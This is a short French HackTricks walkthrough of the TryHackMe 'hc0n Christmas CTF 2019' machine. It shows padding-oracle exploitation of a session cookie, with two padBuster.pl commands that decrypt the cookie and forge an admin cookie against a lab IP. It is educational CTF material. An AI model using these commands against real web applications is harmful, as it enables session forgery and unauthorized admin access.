hacktricks/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md
2023-06-03 13:10:46 +00:00

4.4 KiB

hc0n Christmas CTF - 2019

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Énumération

J'ai commencé à énumérer la machine en utilisant mon outil Legion :

Il y a 2 ports ouverts : 80 (HTTP) et 22 (SSH)

Sur la page web, vous pouvez enregistrer de nouveaux utilisateurs, et j'ai remarqué que la longueur du cookie dépend de la longueur du nom d'utilisateur indiqué :

Et si vous changez un octet du cookie, vous obtenez cette erreur :

Avec cette information et en lisant la vulnérabilité de l'oracle de bourrage, j'ai pu l'exploiter :

perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"

Définir l'utilisateur admin :

perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥